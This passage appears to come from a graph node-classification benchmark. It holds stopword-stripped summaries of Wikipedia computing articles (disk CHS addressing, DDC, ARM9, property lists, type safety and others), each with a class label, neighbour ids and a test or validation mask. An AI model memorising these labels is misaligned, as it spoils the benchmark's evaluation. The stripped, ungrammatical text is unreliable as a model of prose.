    "text": "Cylinder-head-sector:cylinder-head-sector cylinder-head-sector chs early method giving addresses physical block data hard disk drive 3d-coordinate system made vertical coordinate head horizontal radial coordinate cylinder angular coordinate sector head selects circular surface platter disk one two sides cylinder cylindrical intersection stack platters disk centered around disk spindle combined together cylinder head intersect circular line precisely circular strip physical data blocks called track sector finally selects data block track addressed viewed sort angular component chs addresses exposed instead simple linear addresses going 0 total block count disk 1 early hard drives n't come embedded disk controller would hide physical layout separate generic controller card used operating system know exact physical geometry specific drive attached controller correctly address data blocks geometry became complicated example introduction zone bit recording drive sizes grew time chs addressing method became restrictive since late 1980s hard drives begun shipping embedded disk controller good knowledge physical geometry would however report false geometry computer e.g. larger number heads actually present gain addressable space logical chs values would translated controller thus chs addressing longer corresponded physical attributes drive soon hard drive interfaces replaced chs scheme logical block addressing many tools manipulating master boot record mbr partition table still aligned partitions cylinder boundaries thus artifacts chs addressing still seen partitioning programs 2010s early 2010s disk size limitations imposed mbr became problematic guid partition table gpt designed replacement modern computers without mbr longer use notions chs addressing chs addressing process identifying individual sectors aka physical block data disk position track track determined head cylinder numbers terms explained bottom disk addressing sector smallest unit disk controllers introduce address translations map logical physical positions e.g. zone bit recording stores fewer sectors shorter inner tracks physical disk formats necessarily cylindrical sector numbers track skewed floppy disks controllers use physical sector sizes 128 256 512 1024 bytes e.g. pc/ax whereby formats 512 bytes per physical sector became dominant 1980s common physical sector size harddisks today 512 bytes hard disks 520 bytes per sector well non-ibm compatible machines 2005 seagate custom hard disks used sector sizes 1024 bytes per sector advanced format hard disks use 4096 bytes per physical sector 4kn since 2010 also able emulate 512 byte sectors 512e transitional period magneto-optical drives use sector sizes 512 1024 bytes 5.25-inch drives 512 2048 bytes 3.5-inch drives chs addressing sector numbers always start 1 sector 0 lead confusion since logical sector addressing schemes e.g. logical block addressing lba relative sector addressing dos typically start counting 0 physical disk geometries maximal sector number determined low level format disk however disk access bios ibm-pc compatible machines sector number encoded six bits resulting maximal number 111111 63 sectors per track maximum still use virtual chs geometries tracks thin concentric circular strips sectors least one head required read single track respect disk geometries terms track cylinder closely related single double sided floppy disk track common term two heads cylinder common term strictly speaking track given codice_1 combination consisting codice_2 sectors cylinder consists codice_3 sectors cylinder division data disk drive used chs addressing mode fixed block architecture disk cylinder–head–record cchhr addressing mode ckd disk concept concentric hollow cylindrical slices physical disks platters collecting respective circular tracks aligned stack platters number cylinders disk drive exactly equals number tracks single surface drive comprises track number platter spanning tracks across platter surface able store data without regard whether track bad cylinders vertically formed tracks words track 12 platter 0 plus track 12 platter 1 etc cylinder 12 forms direct access storage device dasd drum memory devices ibm 2321 data cell might give blocks addresses include cylinder address although cylinder address n't select geometric cylindrical slice device device called head reads writes data hard drive manipulating magnetic medium composes surface associated disk platter naturally platter 2 sides thus 2 surfaces data manipulated usually 2 heads per platter one per side sometimes term side substituted head since platters might separated head assemblies removable media floppy drive codice_4 addressing supported ibm-pc compatible bioses code used eight bits theoretically 256 heads counted head 0 255 codice_5 however bug versions microsoft dos/ibm pc dos including 7.10 cause operating systems crash boot encountering volumes 256 heads therefore compatible bioses use mappings 255 heads codice_6 including virtual codice_7 geometries historical oddity affect maximum disk size old bios int 13h code well old pc dos similar operating systems codice_8 mb actually codice_9 mb yields known 8 gb limit context relevant definition 8 gb 8192 mb another incorrect limit would require chs codice_10 64 sectors per track tracks cylinders counted 0 i.e. track 0 first outer-most track floppy cylindrical disks old bios code supported ten bits chs addressing 1024 cylinders codice_11 adding six bits sectors eight bits heads results 24 bits supported bios interrupt 13h subtracting disallowed sector number 0 codice_12 tracks corresponds 128 mb sector size 512 bytes codice_13 codice_14 confirms roughly 8 gb limit chs addressing starts codice_15 maximal value codice_16 codice_17 bits codice_18 24 bits limited 255 heads chs values used specify geometry disk count cylinder 0 head 0 resulting maximum codice_19 codice_20 24 bits 256 255 heads chs tuples specifying geometry actually means sectors per track virtual geometry still matches capacity disk contains codice_21 sectors larger hard disks come use cylinder become also logical disk structure standardised 16 065 sectors codice_22 chs addressing 28 bits eide ata-2 permits eight bits sectors still starting 1 i.e. sectors 1…255 four bits heads 0…15 sixteen bits cylinders 0…65535 results roughly 128 gb limit actually codice_23 sectors corresponding 130560 mb sector size 512 bytes codice_24 bits ata-2 specification also covered ralf brown interrupt list old working draft expired standard published old bios limit 1024 cylinders ata limit 16 heads combined effect codice_25 sectors i.e. 504 mb limit sector size 512 bios translation schemes known echs revised echs mitigated limitation using 128 240 instead 16 heads simultaneously reducing numbers cylinders sectors fit codice_26 echs limit 4032 mb codice_27 revised echs limit 7560 mb given total number sectors disk unix communities employ term block refer sector group sectors example linux fdisk utility version 2.25 displayed partition sizes using 1024-byte blocks clusters allocation units data various file systems fat ntfs etc data mainly consists files clusters directly affected physical virtual geometry disk i.e. cluster begin sector near end given codice_1 track end sector physically logically next codice_1 track 2002 ata-6 specification introduced optional 48 bits logical block addressing declared chs addressing obsolete still allowed implement ata-5 translations unsurprisingly chs lba translation formula given also matches last ata-5 chs translation ata-5 specification chs support mandatory 16 514 064 sectors optional larger disks ata-5 limit corresponds chs codice_30 equivalent disk capacities 16514064 16383×16×63 1032×254×63 requires 24 14+4+6 bits 16383 1 2 chs tuples mapped onto lba addresses using following formula lba address n number heads disk n maximum number sectors per track c h chs address logical sector number formula ecma-107 iso/iec 9293:1994 superseding iso 9293:1987 standards fat file systems matches exactly lba formula given logical block address logical sector number lsn synonyms formula use number cylinders requires number heads number sectors per track disk geometry chs tuple addresses different logical sector numbers depending geometry examples help visualize sequencing sectors linear lba model note cylinder head record format used count key data ckd hard disks ibm mainframes since least 1960s largely comparable cylinder head sector format used pcs save sector size fixed could vary track track based needs application contemporary use disk geometry presented mainframe emulated storage firmware longer relation physical disk geometry earlier hard drives used pc mfm rll drives divided cylinder equal number sectors chs values matched physical properties drive drive chs tuple codice_43 would 500 tracks per side platter two platters 4 heads 32 sectors per track total 32 768 000 bytes 31.25 mb ata/ide drives much efficient storing data replaced archaic mfm rll drives use zone bit recording zbr number sectors dividing track varies location groups tracks surface platter tracks nearer edge platter contain blocks data tracks close spindle physical space within given track near edge platter thus chs addressing scheme correspond directly physical geometry drives due varying number sectors per track different regions platter many drives still surplus sectors less 1 cylinder size end drive since total number sectors rarely ever ends cylinder boundary ata/ide drive set system bios configuration cylinders heads sectors exceed capacity drive bios since drive convert given chs value actual address specific hardware configuration however cause compatibility problems operating systems microsoft dos older version windows partition must start end cylinder boundary modern operating systems windows xp included may disregard rule still cause compatibility issues especially user wants perform dual booting drive microsoft follow rule internal disk partition tools since windows vista",
    "neighbors": [
      3841,
      6148,
      6797,
      2193,
      6939,
      6434,
      7983,
      5552,
      434,
      178,
      9907,
      7734,
      8900,
      8393,
      589,
      9166,
      4441,
      5598,
      6118,
      11494,
      1515,
      2545,
      3315,
      5492,
      2811,
      9597
    ],
    "mask": "Test"
  },
  {
    "node_id": 4564,
    "label": 2,
    "text": "AmigaGuide:amigaguide amigaguide hypertext document file format designed amiga files stored ascii possible read edit file without need special software since workbench 2.1 amiga guide system o.s inline help files reading manuals hypertext formatting elements launched amigaos based viewer called simply amigaguide included standard feature amiga system users earlier versions workbench could view files downloading program library amigaguide 34 distributed public domain collections floppy disks example fred fish collection could downloaded directly aminet software repository starting amigaos 3.0 amigaguide tool replaced complete flexible multiview amigaguide default tool viewing amigaguide files used amigaos 2.1 also basic text viewer ascii documents handle multiple files thanks cross-linking tables called xref multiview basically void container natural gui various datatypes open multiview default tool media file including amigaguide files invoked mouse clicking recognized existing correspondent datatype although amigaguide format almost solely used documenting amiga programs viewers available several platforms amigaguide document simple ascii-formatted document edited normal text editor viewed text reader software amigaguide commands begin pronounced 'at symbol recognized amigaguide document first line include text codice_1 three categories commands global node attributes global commands usually specified beginning document nodes defined apply nodes document technically anywhere many commands used globally nodes node commands usable inside node node endnode affect node used attributes may specified anywhere normal line addition symbol attributes always use pair braces enclose attribute name possibly additional arguments commands index help next prev toc all-purpose hypertext link specify nodes jump support naming nodes within current document also support path along name lets node located amigaguide document shown simply embossed text squared buttons page multiview access node another document simply required put amigados file path node name point view amigaguide simple hypertext language since amigaos 3.0 user jump file supported amiga datatypes – pictures animation anything uses multiview program handle internal support datatype amiga standard user must still give node name even though file amigaguide file nodes – syntax codice_2",
    "neighbors": [
      9,
      139,
      6797,
      11023,
      5264,
      2193,
      9236,
      3233,
      9249,
      8618,
      6062,
      432,
      8369,
      8115,
      823,
      6075,
      319,
      1347,
      11076,
      10570,
      5709,
      1742,
      850,
      6233,
      345,
      5729,
      5736,
      11370,
      5743,
      7539,
      11123,
      9848
    ],
    "mask": "Test"
  },
  {
    "node_id": 4565,
    "label": 3,
    "text": "PC-based_IBM-compatible_mainframes:pc-based ibm-compatible mainframes since rise personal computer 1980s ibm vendors created pc-based ibm-compatible mainframes compatible larger ibm mainframe computers period time pc-based mainframe-compatible systems lower price require much electricity floor space however sacrificed performance dependable mainframe-class hardware products popular mainframe developers education training settings small companies non-critical processing certain disaster relief roles field insurance adjustment systems hurricane relief mid-1990s mainframes large machines often occupied entire rooms rooms often air conditioned special power arrangements accommodate three-phase electric power required machines modern mainframes physically comparatively small require little special building arrangements ibm demonstrated use mainframe instruction set first desktop computer—the ibm 5100 released 1975 product used microcode execute many system/370 processor instructions could run slightly modified version ibm apl mainframe program interpreter 1980 rumors spread new ibm personal computer perhaps miniaturized version ibm system/370 1981 ibm personal computer appeared based system 370 architecture however ibm use new pc platform create exotic combinations additional hardware could execute s/370 instructions locally october 1983 ibm announced ibm personal computer xt/370 essentially three-in-one product could run pc dos locally could also act 3270 terminal finally—its important distinguishing feature relative ibm 3270 pc—was could execute s/370 instructions locally xt/370 ibm personal computer xt system unit 5160 three custom 8-bit cards processor card 370pc-p contained two modified motorola 68000 chips could emulate s/370 fixed-point instructions non-floating-point instructions intel 8087 coprocessor modified emulate s/370 floating point instructions second card 370pc-m connected first unique card back connector contained 512 kib memory third card pc3277-em 3270 terminal emulator required download system software host mainframe xt/370 computer booted dos ran vm/pc control program card memory space added additional system memory first 256 kib motherboard memory could used move data 512 kib expansion card expansion memory dual ported provided additional 384 kib xt machine bringing total ram xt side 640 kib memory arbitrator could bank switch second 128 kib bank card banks allowing xt intel 8088 processor address ram 370pc-m card besides 416 kb usable ram s/370 applications xt/370 also supported 4 mb virtual memory using hard drive paging device ibm claimed xt/370 reached 0.1 mips data fit ram 1984 list price xt/370 typical configuration approximately 12,000 compared favorably ibm mainframes /mips basis example ibm 4341 delivered 1.2 mips 500,000 theoretically reduced demand customers mainframes offloading load onto smaller computer customers purchased xt/370s likely increased overall load mainframes increasing ibm mainframe sales similarly mainframe version vm/cms vm/pc also created illusion virtual disks pc version maintained pc-dos files either floppy hard disk example cms virtual disk belonging user fred device address 101 stored dos file fred.101 cms import export commands allowed extraction files virtual drives well ascii/ebcdic conversion xt/370 came xt-style 83-key keyboard 10 function keys newer revisions xt/370 dropped pc3277-em favor ibm 3278/79 boards xt/370 among xt systems could use second hard drive mounted 5161 expansion chassis byte 1984 called xt/370 qualified success magazine praised ibm fitting 370 features xt hoped technical improvements might result even better computer 1984 ibm introduced ibm personal computer at/370 similar cards xt/370 updated software supporting larger hard disks dma transfers 3277 card at/370 processor card system almost 60 faster xt/370 at/370 used different 16-bit interface co-processing cards xt called pc/370-p2 pc/370-m2 latter card still 512 kb memory 480 kb usable programs s/370 mode 32 kb reserved microcode storage terminal emulation function at/370 came 3278/79 emulation adapter late-series xt/370 at/370 motherboard equipped 512 kb ram at/370 also ran vm/pc pc dos 3.0 instead 2.10 xt version used vm/pc version 2 launched november 1985 improved performance 50 allowed add-on memory addition disk used page cache vm november 1985 computerworld article noted machine slow selling april 1988 ibm introduced system/370 workstation shipping customers since august 1987 officially called ibm 7437 vm/sp technical workstation later also known personal system/370 freestanding tower connected mca card installed ps/2 model 60 70 80 7437 tower contained processor 16main memory ps/2 provided i/o disk storage 7437 ran ibm vm/sp operating system one ibm representative described 7437 like 9370 single terminal intended existing s/370 users november 1988 list price 18,100 minimum 25-unit order one intended roles provide single-user s/370-compatible computer could run computer-aided design engineering applications originated ibm mainframes cadam catia graphics support provided ibm 5080 graphics system floor-standing tower 5080 connected 7437 ps/2 via cable mca adapter later ibm introduced personal/370 aka p/370 single slot 32-bit mca card added ps/2 rs/6000 computer run system/370 oss like music/sp vm vse parallel os/2 ps/2 aix rs/6000 supporting multiple concurrent users complete implementation s/370 processor including fpu co-processor 16 mb memory management standard i/o channels provided via host os/hardware additional 370 channel card added provide mainframe-specific i/o 3270 local control units 3400/3480 tape drives 7171 protocol converters although single-card product p/370 ran three times faster 7437 attaining 3.5 mips par low-end ibm 4381 subsequent book author claims 4.1 mips p/370 personal/370 available early november 1989 although special bid basis 1995 ibm introduced card enhanced s/390 microprocessor complex supported ibm esa/390 architecture pc-based system ibm pc-related products evolved support well employing card ibm part number 8640-pb0 ibm pc server 330 1998 ibm pc server 500 models important goal design s/390 processor card complete compatibility existing mainframe operating systems software processor implements esa/390 xa instructions prevents need instruction translation three generations card r/390 designation used expansion card used ibm rs/6000 server original r/390 featured 67 77 mhz power2 processor 32 512 mb ram depending configuration mca p/390 expansion card installed mca rs/6000 system pci p/390 card installed number early pci rs/6000s configurations referred r/390 r/390 servers need run aix version 4 host operating system p/390 designation used expansion card used ibm pc server less expensive r/390 original p/390 server housed ibm pc server 500 featured 90 mhz intel pentium processor running os/2 model revised mid-1996 rebranded pc server 520 featured 133 mhz intel pentium processor models came standard 32 mb ram expandable 256 mb pc server 500 featured eight mca expansion slots pc server 520 added two pci expansion slots removed two mca slots s/390 integrated server aka s/390 mainframe housed comparably small case hxwxd 82 x 52 x 111 cm became available november 1998 intended customers require i/o bandwidth performance s/390 multiprise 3000 size 256 mb ecc memory single cmos main processor performance 8 mips used s/390 cpu used integrated server fact p/390 e-card pentium ii used iosp i/o service processor supports four escon four parallel channels standard pci isa slots present maximum 255 gb internal harddisks supported 16x 18gb hds 2x hds redundancy supported oss os/390 mvs/esa vm/esa vse/esa fujitsu offers two pc-compatible systems make lower end fujitsu s/390-based bs2000 mainframe product line sq100 slower configuration using dual-core 2.93ghz intel xeon e7220 processors capable 200rpf performance sq200 introduced recently uses six-core 2.66ghz xeon x7542 processors performance 700rpf intel 64-based bs2000 mainframes run linux windows separate partitions fujitsu also continues make custom s/390-native processors mainframe hardware high end bs2000 line since late 1990s pc processors become fast enough perform mainframe emulation without need coprocessor card currently several personal computer emulators available support system/390 z/architecture",
    "neighbors": [
      7607,
      421,
      7269,
      3304,
      11673,
      8379,
      6415,
      7151,
      7217,
      3443,
      11539,
      1461,
      2519,
      2168,
      11447,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 4566,
    "label": 4,
    "text": "John_C._Inglis:john c. inglis john chris inglis also known chris inglis former deputy director national security agency retired deputy director january 10 2014 inglis born baltimore maryland 29 october 1954 graduated andover high school linthicum 1972 inglis distinguished eagle scout high school inglis attended united states air force academy graduating 1976 distinguished graduate bachelor science degree engineering mechanics inglis training includes undergraduate instructor pilot training also attended air war college designated outstanding graduate",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      327,
      266,
      6668,
      365,
      9357,
      4719,
      7759,
      2897,
      1714,
      7887,
      10832,
      2712,
      6749
    ],
    "mask": "None"
  },
  {
    "node_id": 4567,
    "label": 3,
    "text": "Display_Data_Channel:display data channel display data channel ddc collection protocols digital communication computer display graphics adapter enable display communicate supported display modes adapter enable computer host adjust monitor parameters brightness contrast standard created video electronics standards association vesa ddc suite standards aims provide plug play experience computer displays ddc1 ddc2b/ab/b+/bi protocols physical link monitor video card originally carried either two three pins 15-pin analog vga connector extended display identification data edid companion standard defines compact binary file format describing monitor capabilities supported graphics modes stored read-only memory eeprom chip programmed manufacturer monitor format uses description block containing 128 bytes data optional extension blocks provide additional information current version enhanced edid e-edid release v2.0 first version ddc standard adopted august 1994 included edid 1.0 format specified ddc1 ddc2b ddc2ab physical links ddc version 2 introduced april 1996 split edid separate standard introduced ddc2b+ protocol ddc version 3 december 1997 introduced ddc2bi protocol support vesa plug display flat panel display interface separate device addresses requiring comply edid 2.0 ddc standard superseded e-ddc 1999 prior ddc vga standard reserved four pins analog vga connector known id0 id1 id2 id3 pins 11 12 4 15 identification monitor type id pins attached resistors pull one ground gnd allowed definition monitor type open n/c connected meaning monitor commonly documented scheme id3 pin unused 3 remaining pins defined id0 pulled gnd color monitors monochrome monitors pulled id1 gnd finally id2 pulled gnd signaled monitor capable 1024×768 resolution ibm 8514 scheme input states id pins would encode monitor type follows elaborate schemes also existed used 4 id pins manipulating hsync vsync signals order extract 16 bits 4 id pin values 4 combinations hsync vsync states monitor identification ddc changed purpose id pins incorporate serial link interface however transition change backwards-compatible video cards using old scheme could problems ddc-capable monitor connected ddc signal send video graphics array vga monitor ic protocol using master serial clock serial data pins ddc1 simple low-speed unidirectional serial link protocol pin 12 id1 functions data line continuously transmits 128-byte edid block data clock synchronised vertical sync providing typical clock rates 60 100 hz display devices implemented protocol common version called ddc2b based i²c serial bus pin 12 id1 vga connector used data pin i²c bus formerly-unused pin 15 became i²c clock pin 9 previously used mechanical key supplied +5v dc power 50ma drive eeprom allows host read edid even monitor powered though i²c fully bidirectional supports multiple bus-masters ddc2b unidirectional allows one bus master graphics adapter monitor acts slave device 7-bit i²c address 50h provides 128-256 bytes read-only edid access always read first i²c octet always a1h ddc2ab implementation i²c-based 100 kbit/s access.bus interface allowed monitor manufacturers support external access.bus peripherals mouse keyboard little additional effort devices monitors briefly available mid 1990s disappeared introduction usb ddc2b+ ddc2bi scaled-down versions ddc2ab support monitor graphics card devices still allow bidirectional communication ddc2 exclusive vga connector dvi hdmi connectors feature dedicated ddc2b wires ddc/ci command interface standard introduced august 1998 specifies means computer send commands monitor well receive sensor data monitor bidirectional link specific commands control monitors defined separate monitor control command set mccs standard version 1.0 released september 1998 ddc/ci monitors sometimes supplied external color sensor allow automatic calibration monitor color balance tilting ddc/ci monitors support auto-pivot function rotation sensor monitor enables operating system keep display upright monitor moved portrait landscape positions ddc/ci monitors support small subset mccs commands undocumented commands many manufacturers pay attention ddc/ci past almost monitors support general mccs commands brightness contrast management ddc/ci standard describes full suite bidirectional control protocols ddc2ab ddc2bi ddc2b+ single standard provides means packaging monitor control command set commands ddc/ci version 1.1 adopted october 2004 monitor control command set version 2.0 adopted october 2003 new mccs v3 introduced july 2006 though n't gain enough industry attention yet latest release v2 standard version 2.2 adopted february 2009 enhanced display data channel e-ddc recent revision ddc standard version 1 introduced september 1999 featured addition segment pointer allowed 32 kbytes display information storage use enhanced edid e-edid standard earlier ddc implementations used simple 8-bit data offset communicating edid memory monitor limiting storage size 2 bytes 256 bytes allowing use cheap 2-kbit eeproms e-ddc special i²c addressing scheme introduced multiple 256-byte segments could selected single 8-bit segment index passed display via i²c address 30h access always write first i²c octet always 60h data selected segment immediately read via regular ddc2 address using repeated i²c 'start signal however vesa specification defines segment index value range 00h 7fh allows addressing 128 segments × 256 bytes segment index register volatile defaulting zero automatically resetting zero nack stop therefore must set every time access data first 256-byte segment performed auto-reset mechanism provide backward compatibility example ddc2b hosts otherwise may stuck segment 00h rare cases important changes removal ddc1 ddc2ab protocols deprecation separate vesa p fpdi device addresses clarifications ddc power requirements e-ddc version 1.1 approved march 2004 featured support hdmi consumer electronics e-ddc version 1.2 approved december 2007 introduced support displayport dedicated ddc2b links uses bidirectional auxiliary channel edid mccs communication displayid standards e-ddc version 1.3 september 2017 contains corrections errata minor clarifications kvm switches keyboard-video-mouse video extenders handle ddc traffic incorrectly making necessary disable monitor plug play features operating system maybe even physically remove pin 12 serial data pin analog vga cables connect device multiple pcs microsoft windows features standard plug play monitor driver uses display edid information construct list supported monitor modes display resolution control panel applet allows user disable driver plug play features manually select resolution refresh rate supported video card many video card manufacturers third parties provide control applications allow user select custom display mode conform edid information monitor .inf file",
    "neighbors": [
      9056,
      9057,
      2594,
      9321,
      7594,
      11631,
      10833,
      11634,
      6995,
      6233,
      3548,
      3453
    ],
    "mask": "None"
  },
  {
    "node_id": 4568,
    "label": 4,
    "text": "ZoneAlarm_Z100G:zonealarm z100g zonealarm secure wireless router z100g discontinued unified threat management security router home soho market z100g developed sofaware technologies check point company hardware similar sofaware safe office vpn-1 edge lines software differs features license allows user access degree zonealarm z100g provides networking security related features including",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      6797,
      1172,
      8343,
      9496,
      3482,
      1436,
      4511,
      6431,
      2082,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      9048,
      4953,
      2907,
      6364,
      8668,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4569,
    "label": 3,
    "text": "ARM9:arm9 arm9 group older 32-bit risc arm processor cores licensed arm holdings microcontroller use arm9 core family consists arm9tdmi arm940t arm9e-s arm966e-s arm920t arm922t arm946e-s arm9ej-s arm926ej-s arm968e-s arm996hs since arm9 cores released 1998 2006 longer recommended new ic designs instead arm cortex-a arm cortex-m arm cortex-r cores preferred design generation arm moved von neumann architecture princeton architecture modified meaning split cache harvard architecture separate instruction data buses caches significantly increasing potential speed silicon chips integrating cores package modified harvard architecture chips combining two address buses side separated cpu caches tightly coupled memories two subfamilies implementing different arm architecture versions key improvements arm7 cores enabled spending transistors include additionally arm9 cores incorporate enhanced dsp instructions multiply-accumulate support efficient implementations digital signal processing algorithms switching von neumann architecture entailed non-unified cache instruction fetches evict data vice versa arm9 cores separate data address bus signals chip designers use various ways cases connect least part address space von neumann style used instructions data usually ahb interconnect connecting dram interface external bus interface usable flash memory hybrids longer pure harvard architecture processors arm holdings neither manufactures sells cpu devices based designs rather licenses processor architecture interested parties arm offers variety licensing terms varying cost deliverables licensees arm provides integratable hardware description arm core well complete software development toolset right sell manufactured silicon containing arm cpu integrated device manufacturers idm receive arm processor ip synthesizable rtl written verilog form ability perform architectural level optimizations extensions allows manufacturer achieve custom design goals higher clock speed low power consumption instruction set extensions optimizations size debug support etc determine components included particular arm cpu chip consult manufacturer datasheet related documentation arm mpcore family multicore processors support software written using either asymmetric amp symmetric smp multiprocessor programming paradigms amp development central processing unit within mpcore may viewed independent processor follow traditional single processor development strategies arm9tdmi successor popular arm7tdmi core also based armv4t architecture cores based support 32-bit arm 16-bit thumb instruction sets include arm9e arm9ej sibling implement basic arm9tdmi pipeline add support armv5te architecture includes dsp-esque instruction set extensions addition multiplier unit width doubled halving time required multiplication operations support 32-bit 16-bit sometimes 8-bit instruction sets amount documentation arm chips daunting especially newcomers documentation microcontrollers past decades would easily inclusive single document chips evolved documentation grown total documentation especially hard grasp arm chips since consists documents ic manufacturer documents cpu core vendor arm holdings typical top-down documentation tree high-level marketing slides datasheet exact physical chip detailed reference manual describes common peripherals aspects physical chips within series reference manual exact arm core processor within chip reference manual arm architecture core includes detailed description instruction sets ic manufacturer additional documents including evaluation board user manuals application notes getting started development software software library documents errata",
    "neighbors": [
      7170,
      10767,
      8720,
      11282,
      5659,
      10784,
      38,
      4139,
      8237,
      11314,
      8250,
      6203,
      8253,
      6207,
      7234,
      7235,
      2635,
      7269,
      11374,
      7281,
      3698,
      4211,
      5237,
      630,
      638,
      11395,
      9863,
      11405,
      1170,
      659,
      5267,
      9366,
      666,
      5786,
      9371,
      4773,
      682,
      9391,
      2224,
      11447,
      9913,
      5823,
      8383,
      10945,
      7877,
      9928,
      8909,
      4821,
      6878,
      2788,
      9964,
      2814,
      7445,
      6949,
      6950,
      8487,
      3883,
      2862,
      11054,
      10548,
      1849,
      6971,
      6981,
      5963,
      5457,
      9044,
      6495,
      1377,
      10601,
      10603,
      6001,
      11125,
      3467,
      398,
      4508,
      9638,
      9155,
      966,
      9163,
      6607,
      7631,
      2517,
      9174,
      9685,
      2524,
      3050,
      5617,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 4570,
    "label": 4,
    "text": "Spanish_Network_of_Excellence_on_Cybersecurity_Research:spanish network excellence cybersecurity research spanish network excellence cybersecurity research renic research initiative promote cybersecurity interests spain",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4571,
    "label": 2,
    "text": "Property_list:property list macos ios nextstep gnustep programming frameworks property list files files store serialized objects property list files use filename extension .plist thus often referred p-list files property list files often used store user settings also used store information bundles applications task served resource fork old mac os since data represented property lists somewhat abstract underlying file format implemented many ways namely nextstep used one format represent property list subsequent gnustep macos frameworks introduced differing formats nextstep property lists designed human-readable edited hand serialized ascii syntax somewhat like programming language strings represented binary data represented arrays represented dictionaries represented one limitation original next property list format could represent nsvalue number boolean etc object gnustep adopts nextstep format additions first supports nsvalue objects represented plain ascii second supports nsdate objects serialized *dyyyy-mm-dd hh mm ss timezone gnustep also read write property lists formats used macos macos also read nextstep format apple sets aside favor two new formats mac os x 10.0 nextstep format deprecated new xml format introduced public dtd defined apple xml format supports non-ascii characters storing nsvalue objects unlike gnustep ascii property list format apple ascii property list format support since xml files however space-efficient means storage mac os x 10.2 introduced new format property list files stored binary files starting mac os x 10.4 default format preference files mac os x 10.7 support reading writing files json format introduced json property lists fully compatible though example property lists native date data types json format support conversely json permits null values property lists support explicit nulls plutil utility introduced mac os x 10.2 used check syntax property lists convert property list file one format another also defaults utility introduced nextstep used manipulate plist files used storage preferences also known os x defaults hence name command line via preferences domain utility used edit arbitrary plist files another tool plistbuddy command line utility resides /usr/libexec/plistbuddy useful merging plist files altering entries related software development xml json property lists hand-editable text editor additionally apple provides support xcode editing property lists hierarchical viewer/editor handle plists formatted binary xml json mac os x 10.4 apple provides applescript interface reading property list files system events application mac os x 10.5 apple provides applescript interface editing creating writing property list files well xml format tags related foundation classes corefoundation types data storage formats follows binary file format documented comment block c code source file apple open sourced implementation binary plists foundation library apple describes implementation opaque plist manual page documentation means reliance format discouraged binary file format magic number first bytes file indicate valid plist file text bplist binary file store information captured xml json file formats array set dictionary binary types made pointers objref keyref entries index object table file means binary plists capture fact example separate array dictionary serialized file data element stored captured xml file converting binary file result copy data element placed xml file additionally binary file uid type used identify data items serialized practice uid type simply expanded 64 bit integer complete list data stored taken c code source file follows although best known apple darwin systems including ios macos plist files also present windows computers apple software itunes safari installed windows files typically binary files although applications may generate plist files formats windows plist files stored user ’ home directory following path plist files windows typically store preferences information rather using windows registry options editing plist files windows extensive macos file xml json format care text editor notepad++ used apple ships utility named plutil.exe apple application support package part itunes convert binary plist files xml edited text xml editor plisteditorpro afterwards convert back binary using plutil.exe provides zero cost solution plist editing windows commercial tool plistinator plist editor handles xml binary plist files windows introduced 2006 first released netbsd 4.0 2007 proplib library used serialising data kernel userland one sample users proplib second revision sysmon envsys framework system monitoring netbsd proplib library also ported dragonfly 2010 available since dragonfly bsd 2.8",
    "neighbors": [
      4615,
      10765,
      4111,
      5647,
      1042,
      9762,
      6700,
      1071,
      4657,
      1074,
      8262,
      9802,
      5710,
      5713,
      3670,
      4184,
      2141,
      4702,
      1637,
      2149,
      8303,
      8304,
      8816,
      6771,
      2676,
      7806,
      9343,
      3719,
      10888,
      11402,
      2193,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3758,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      8909,
      3790,
      9430,
      7383,
      3289,
      8410,
      4318,
      7907,
      231,
      9451,
      10478,
      2288,
      11506,
      7928,
      1273,
      8441,
      7422,
      11521,
      2819,
      1796,
      1286,
      1801,
      10000,
      10512,
      274,
      4888,
      11037,
      6438,
      8998,
      811,
      3371,
      6958,
      7983,
      9009,
      10036,
      9529,
      4933,
      9035,
      1361,
      850,
      1878,
      7521,
      866,
      1891,
      8546,
      4457,
      2415,
      9100,
      9109,
      1439,
      11698,
      9671,
      1993,
      6093,
      7118,
      3035,
      479,
      4068,
      5093,
      487,
      10221,
      2545,
      5619,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 4572,
    "label": 9,
    "text": "Type_safety:type safety computer science type safety extent programming language discourages prevents type errors type error erroneous undesirable program behaviour caused discrepancy differing data types program constants variables methods functions e.g. treating integer int floating-point number float type safety sometimes alternatively considered property computer program rather language program written languages type-safe facilities circumvented programmers adopt practices exhibit poor type safety formal type-theoretic definition type safety considerably stronger understood programmers type enforcement static catching potential errors compile time dynamic associating type information values run-time consulting needed detect imminent errors combination behaviors classified type errors given programming language usually result attempts perform operations values appropriate data type classification partly based opinion may imply operation leading program crashes security flaws obvious failures legitimate need considered error may imply contravention programmer explicit intent communicated via typing annotations erroneous type-safe context static compile-time type systems type safety usually involves among things guarantee eventual value expression legitimate member expression static type precise requirement subtle — see example subtype polymorphism complications type safety closely linked memory safety restriction ability copy arbitrary bit patterns one memory location another instance implementation language type formula_1 sequence bits appropriate length represent legitimate member formula_1 language allows data copied variable type formula_1 type-safe operation might assign non-formula_1 value variable conversely language type-unsafe extent allowing arbitrary integer used pointer memory-safe statically typed languages provide degree type safety strictly stronger memory safety type systems enforce proper use abstract data types defined programmers even strictly necessary memory safety prevention kind catastrophic failure type-safe code accesses memory locations authorized access discussion type safety specifically refers memory type safety confused type safety broader respect example type-safe code read values another object private fields robin milner provided following slogan describe type safety appropriate formalization slogan depends style formal semantics used particular language context denotational semantics type safety means value expression well-typed say type τ bona fide member set corresponding τ 1994 andrew wright matthias felleisen formulated standard definition proof technique type safety languages defined operational semantics approach type safety determined two properties semantics programming language properties exist vacuum linked semantics programming language describe large space varied languages fit criteria since notion well typed program part static semantics programming language notion getting stuck going wrong property dynamic semantics vijay saraswat provides following definition type safety ultimately aimed 